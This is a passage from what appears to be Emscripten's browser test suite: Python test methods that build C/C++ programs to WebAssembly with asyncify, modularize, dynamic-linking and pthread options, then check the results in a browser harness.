self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-Os', '-s', 'ASSERTIONS', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP', '-lSDL', '-s', 'ASYNCIFY'], timeout=90)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-Os', '-s', 'ASYNCIFY'])
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=['-s', 'ASYNCIFY'])
def test_async_iostream(self):
self.btest('browser/async_iostream.cpp', '1', args=['-s', 'ASYNCIFY'])
# Test an async return value. The value goes through a custom JS library
# method that uses asyncify, and therefore it needs to be declared in
# ASYNCIFY_IMPORTS.
# To make the test more precise we also use ASYNCIFY_IGNORE_INDIRECT here.
@parameterized({
'normal': (['-s', 'ASYNCIFY_IMPORTS=["sync_tunnel"]'],), # noqa
'response': (['-s', 'ASYNCIFY_IMPORTS=@filey.txt'],), # noqa
'nothing': (['-DBAD'],), # noqa
'empty_list': (['-DBAD', '-s', 'ASYNCIFY_IMPORTS=[]'],), # noqa
'em_js_bad': (['-DBAD', '-DUSE_EM_JS'],), # noqa
})
def test_async_returnvalue(self, args):
if '@' in str(args):
create_test_file('filey.txt', '["sync_tunnel"]')
self.btest('browser/async_returnvalue.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_IGNORE_INDIRECT', '--js-library', path_from_root('tests', 'browser', 'async_returnvalue.js')] + args + ['-s', 'ASSERTIONS'])
def test_async_stack_overflow(self):
self.btest('browser/async_stack_overflow.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_STACK_SIZE=4'])
def test_async_bad_list(self):
self.btest('browser/async_bad_list.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_ONLY=["waka"]', '--profiling'])
# Tests that when building with -s MINIMAL_RUNTIME=1, the build can use -s MODULARIZE=1 as well.
def test_minimal_runtime_modularize(self):
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.html', '-s', 'MODULARIZE', '-s', 'MINIMAL_RUNTIME'])
self.run_browser('test.html', None, '/report_result?0')
@requires_sync_compilation
def test_modularize(self):
for opts in [
[],
['-O1'],
['-O2', '-profiling'],
['-O2'],
['-O2', '--closure', '1']
]:
for args, code in [
# defaults
([], '''
let promise = Module();
if (!promise instanceof Promise) throw new Error('Return value should be a promise');
'''),
# use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // errorneous module capture will load this and cause timeout
let promise = HelloWorld();
if (!promise instanceof Promise) throw new Error('Return value should be a promise');
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
# Even without a mem init file, everything is async
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
]:
print('test on', opts, args, code)
# this test is synchronous, so avoid async startup due to wasm features
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-s', 'MODULARIZE', '-s', 'SINGLE_FILE'] + args + opts)
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
def test_modularize_network_error(self):
test_c_path = path_from_root('tests', 'browser_test_hello_world.c')
browser_reporting_js_path = path_from_root('tests', 'browser_reporting.js')
self.compile_btest([test_c_path, '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path])
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err.message.slice(0, 54));
});
</script>
''')
print('Deleting a.out.wasm to cause a download error')
os.remove('a.out.wasm')
self.run_browser('a.html', '...', '/report_result?abort(both async and sync fetching of the wasm failed)')
def test_modularize_init_error(self):
test_cpp_path = path_from_root('tests', 'browser', 'test_modularize_init_error.cpp')
browser_reporting_js_path = path_from_root('tests', 'browser_reporting.js')
self.compile_btest([test_cpp_path, '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path])
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
if (typeof window === 'object') {
window.addEventListener('unhandledrejection', function(event) {
reportResultToServer("Unhandled promise rejection: " + event.reason.message);
});
}
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err);
});
</script>
''')
self.run_browser('a.html', '...', '/report_result?intentional error to test rejection')
# test illustrating the regression on the modularize feature since commit c5af8f6
# when compiling with the --preload-file option
def test_modularize_and_preload_files(self):
# amount of memory different from the default one that will be allocated for the emscripten heap
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
# the main function simply checks that the amount of allocated heap memory is correct
create_test_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// use eval here in order for the test with closure compiler enabled to succeed
var totalMemory = Module['INITIAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
REPORT_RESULT(0);
return 0;
}
''' % totalMemory)
# generate a dummy file
create_test_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
self.compile_btest(['test.c', '-s', 'WASM=0', '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom INITIAL_MEMORY value
var foo = Foo({ INITIAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?0')
def test_webidl(self):
# see original in test_core.py
self.run_process([PYTHON, path_from_root('tools', 'webidl_binder.py'),
path_from_root('tests', 'webidl', 'test.idl'),
'glue'])
self.assertExists('glue.cpp')
self.assertExists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(os.path.join('webidl', 'test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)
@requires_sync_compilation
def test_dynamic_link(self):
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
REPORT_RESULT(2);
return 0;
}
''')
create_test_file('side.cpp', r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
print('wasm in worker (we can read binary data synchronously there)')
create_test_file('pre.js', '''
var Module = { dynamicLibraries: ['side.wasm'] };
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '--proxy-to-worker', '-s', 'EXPORT_ALL'])
print('wasm (will auto-preload since no sync binary reading)')
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
# same wasm side module works
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
# verify that dynamic linking works in all kinds of in-browser environments.
# don't mix different kinds in a single test.
@parameterized({
'': ([0],),
'inworker': ([1],),
})
def test_dylink_dso_needed(self, inworker):
self.emcc_args += ['-O2']
# --proxy-to-worker only on main
if inworker:
self.emcc_args += ['--proxy-to-worker']
def do_run(src, expected_output):
# XXX there is no infrastructure (yet ?) to retrieve stdout from browser in tests.
# -> do the assert about expected output inside browser.
#
# we have to put the hook into post.js because in main it is too late
# (in main we won't be able to catch what static constructors inside
# linked dynlibs printed), and in pre.js it is too early (out is not yet
# setup by the shell).
create_test_file('post.js', r'''
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = "";
Module.printed += x + '\n'; // out is passed str without last \n
Module.realPrint(x);
};
''')
create_test_file('test_dylink_dso_needed.c', src + r'''
#include <emscripten/em_asm.h>
int main() {
int rtn = test_main();
EM_ASM({
var expected = %r;
assert(Module.printed === expected, ['stdout expected:', expected]);
});
return rtn;
}
''' % expected_output)
self.btest_exit(self.in_dir('test_dylink_dso_needed.c'), 0, args=self.get_emcc_args() + ['--post-js', 'post.js'])
self._test_dylink_dso_needed(do_run)
@requires_graphics_hardware
@requires_sync_compilation
def test_dynamic_link_glemu(self):
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
REPORT_RESULT(1);
return 0;
}
''')
create_test_file('side.cpp', r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-lSDL', '-s', 'EXPORT_ALL'])
self.btest(self.in_dir('main.cpp'), '1', args=['-s', 'MAIN_MODULE', '-O2', '-s', 'LEGACY_GL_EMULATION', '-lSDL', '-lGL', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
def test_dynamic_link_many(self):
# test asynchronously loading two side modules during startup
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side1.wasm', 'side2.wasm'];
''')
create_test_file('main.c', r'''
int side1();
int side2();
int main() {
return side1() + side2();
}
''')
create_test_file('side1.c', r'''
int side1() { return 1; }
''')
create_test_file('side2.c', r'''
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.c', '-s', 'SIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.c', '-s', 'SIDE_MODULE', '-o', 'side2.wasm'])
self.btest_exit(self.in_dir('main.c'), '3',
args=['-s', 'MAIN_MODULE', '--pre-js', 'pre.js'])
def test_dynamic_link_pthread_many(self):
# Test asynchronously loading two side modules during startup
# They should always load in the same order
# Verify that function pointers in the browser's main thread
# reffer to the same function as in a pthread worker.
# The main thread function table is populated asynchronously
# in the browser's main thread. However, it should still be
# populated in the same order as in a pthread worker to
# guarantee function pointer interop.
create_test_file('main.cpp', r'''
#include <thread>
int side1();
int side2();
int main() {
auto side1_ptr = &side1;
auto side2_ptr = &side2;
// Don't join the thread since this is running in the
// browser's main thread.
std::thread([=]{
REPORT_RESULT(int(
side1_ptr == &side1 &&
side2_ptr == &side2
));
}).detach();
return 0;
}
''')
# The browser will try to load side1 first.
# Use a big payload in side1 so that it takes longer to load than side2
create_test_file('side1.cpp', r'''
char const * payload1 = "''' + str(list(range(1, int(1e5)))) + r'''";
int side1() { return 1; }
''')
create_test_file('side2.cpp', r'''
char const * payload2 = "0";
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.cpp', '-Wno-experimental', '-pthread', '-s', 'SIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.cpp', '-Wno-experimental', '-pthread', '-s', 'SIDE_MODULE', '-o', 'side2.wasm'])
self.btest(self.in_dir('main.cpp'), '1',
args=['-Wno-experimental', '-pthread', '-s', 'MAIN_MODULE',
'-s', 'RUNTIME_LINKED_LIBS=["side1.wasm","side2.wasm"]'])
def test_memory_growth_during_startup(self):
create_test_file('data.dat', 'X' * (30 * 1024 * 1024))
self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=16MB', '-s', 'TOTAL_STACK=16384', '--preload-file', 'data.dat'])
# pthreads tests
def prep_no_SAB(self):
create_test_file('html.html', open(path_from_root('src', 'shell_minimal.html')).read().replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
@requires_threads
def test_pthread_c11_threads(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_c11_threads.c'),
expected='0',
args=['-g4', '-std=gnu11', '-xc', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'TOTAL_MEMORY=64mb'])
# Test that the emscripten_ atomics api functions work.
@parameterized({
'normal': ([],),
'closure': (['--closure', '1'],),
})
@requires_threads
def test_pthread_atomics(self, args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-g1'] + args)
# Test 64-bit atomics.
@requires_threads
def test_pthread_64bit_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit C++11 atomics.
@requires_threads
def test_pthread_64bit_cxx11_atomics(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [[], ['-s', 'USE_PTHREADS']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_cxx11_atomics.cpp'), expected='0', args=opt + pthreads)
# Test c++ std::thread::hardware_concurrency()
@requires_threads
def test_pthread_hardware_concurrency(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_hardware_concurrency.cpp'), expected='0', args=['-O2', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE="navigator.hardwareConcurrency"'])
@parameterized({
'join': ('join',),
'wait': ('wait',),
})
@requires_threads
def test_pthread_main_thread_blocking(self, name):
print('Test that we error if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(path_from_root('tests', 'pthread', 'main_thread_%s.cpp' % name), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
if name == 'join':
print('Test that by default we just warn about blocking on the main thread.')
self.btest(path_from_root('tests', 'pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(path_from_root('tests', 'pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD, and even without a pool')
self.btest(path_from_root('tests', 'pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that everything works ok when we are on a pthread.')
self.btest(path_from_root('tests', 'pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'PROXY_TO_PTHREAD', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomic_fetch_and_op(self):
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-Os']]:
for debug in [[], ['-g']]:
args = opt + debug
print(args)
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_fetch_and_op.cpp'), expected='0', args=args + ['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# 64 bit version of the above test.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Tests the rest of the remaining GCC atomics after the two above tests.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
@requires_threads
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_spinlock.cpp'), expected='800', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, also_asmjs=True)
# Test that basic thread creation works.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_create(self):
def test(args):
print(args)
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create.cpp'),
expected='0',
args=['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + args,
extra_tries=0) # this should be 100% deterministic
print() # new line
test([])
test(['-O3'])
# TODO: re-enable minimal runtime once the flakiness is figure out,
# https://github.com/emscripten-core/emscripten/issues/12368
# test(['-s', 'MINIMAL_RUNTIME'])
# Test that preallocating worker threads work.
@requires_threads
def test_pthread_preallocates_workers(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_preallocates_workers.cpp'), expected='0', args=['-O3', '-s', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=4', '-s', 'PTHREAD_POOL_DELAY_LOAD'])
# Test that allocating a lot of threads doesn't regress. This needs to be checked manually!
@requires_threads
def test_pthread_large_pthread_allocation(self):
self.btest(path_from_root('tests', 'pthread', 'test_large_pthread_allocation.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=128MB', '-O3', '-s', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=50'], message='Check output from test to ensure that a regression in time it takes to allocate the threads has not occurred.')
# Tests the -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_pthread_proxy_to_pthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxy_to_pthread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Test that a pthread can spawn another pthread of its own.
@requires_threads
def test_pthread_create_pthread(self):
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'] + modularize)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
@requires_threads
def test_pthread_nested_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_nested_spawns.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that main thread can wait for a pthread to finish via pthread_join().
@requires_threads
def test_pthread_join(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_join.cpp'), expected='6765', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that threads can rejoin the pool once detached and finished
@requires_threads
def test_std_thread_detach(self):
self.btest(path_from_root('tests', 'pthread', 'test_std_thread_detach.cpp'), expected='0', args=['-s', 'USE_PTHREADS'])
# Test pthread_cancel() operation
@requires_threads
def test_pthread_cancel(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cancel.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test pthread_kill() operation
@no_chrome('pthread_kill hangs chrome renderer, and keep subsequent tests from passing')
@requires_threads
def test_pthread_kill(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_kill.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
@requires_threads
def test_pthread_cleanup(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cleanup.cpp'), expected='907640832', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Tests the pthread mutex api.
@requires_threads
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_mutex.cpp'), expected='50', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
@requires_threads
def test_pthread_attr_getstack(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_attr_getstack.cpp'), expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Stress test pthreads allocating memory that will call to sbrk(), and main thread has to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc_free.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'INITIAL_MEMORY=256MB'])
# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_barrier.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_once.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test against a certain thread exit time handling bug by spawning tons of threads.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_spawns.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '--closure', '1', '-s', 'ENVIRONMENT=web,worker'])
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
@requires_threads
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_volatile.cpp'), expected='1', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_thread_local_storage.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ASSERTIONS'])
# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_condition_variable.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
def run(debug):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_printf.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'LIBRARY_DEBUG=%d' % debug])
run(debug=True)
run(debug=False)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
def test_pthread_iostream(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_iostream.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
@requires_threads
def test_pthread_unistd_io_bigint(self):
self.btest_exit(path_from_root('tests', 'unistd', 'io.c'), 0, args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'WASM_BIGINT'])
# Test that the main thread is able to use pthread_set/getspecific.
@requires_threads
def test_pthread_setspecific_mainthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS'], also_asmjs=True)
# Test that pthreads have access to filesystem.
@requires_threads
def test_pthread_file_io(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_file_io.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_supported.cpp'), expected='0', args=['-O3'] + args)
@requires_threads
def test_pthread_dispatch_after_exit(self):
self.btest_exit(path_from_root('tests', 'pthread', 'test_pthread_dispatch_after_exit.c'), 0, args=['-s', 'USE_PTHREADS'])
# Test the operation of Module.pthreadMainPrefixURL variable
@no_wasm_backend('uses js')
@requires_threads
def test_pthread_custom_pthread_main_url(self):
ensure_dir('cdn')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
int result = 0;
void *thread_main(void *arg) {
emscripten_atomic_store_u32(&result, 1);
pthread_exit(0);
}
int main() {
pthread_t t;
if (emscripten_has_threading_support()) {
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
} else {
result = 1;
}
REPORT_RESULT(result);
}
''')
# Test that it is possible to define "Module.locateFile" string to locate where worker.js will be loaded from.
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-o', 'test.html'])
shutil.move('test.worker.js', os.path.join('cdn', 'test.worker.js'))
shutil.copyfile('test.html.mem', os.path.join('cdn', 'test.html.mem'))
self.run_browser('test.html', '', '/report_result?1')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
